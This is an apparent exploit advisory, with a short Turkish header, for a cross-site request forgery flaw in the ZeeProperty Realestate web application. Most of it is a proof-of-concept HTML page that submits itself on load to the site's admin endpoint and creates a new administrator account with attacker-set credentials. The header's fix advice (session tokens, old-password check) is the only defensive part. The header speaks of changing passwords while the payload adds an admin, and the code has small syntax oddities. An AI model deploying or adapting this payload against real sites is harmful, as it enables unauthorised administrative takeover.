< ------------------- header data start ------------------- >

#############################################################

# Application Name : ZeeProperty Realestate

# Vulnerable Type : Cross Site Request Forgery

# Infection : Yönetici ve user sifreleri uzaktan degisilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<Form Action=http://www.Site.com/admin/addadminmembercode.php method=post name=BizaRRo >
<input name=username type=hidden class=textbox id=username size=40 maxlength=40 value=bizo />
<input name=fname type=hidden class=textbox id=fname size=40 maxlength=40 value=bizo />
<input name=lname type=hidden class=textbox id=lname size=40 maxlength=40 value=bizo />
<input name=email type=hidden class=textbox id=email size=40 maxlength=40 value=[email protected] />
<input name=password type=hidden class=textbox id=password size=40 maxlength=40 value=bizo />
<input name=password1 type=hidden class=textbox id=password1 size=40 maxlength=40 value=bizo />
<input name=btnsubmit type=submit id=btnsubmit value=Add Member />

< -- bug code end of -- >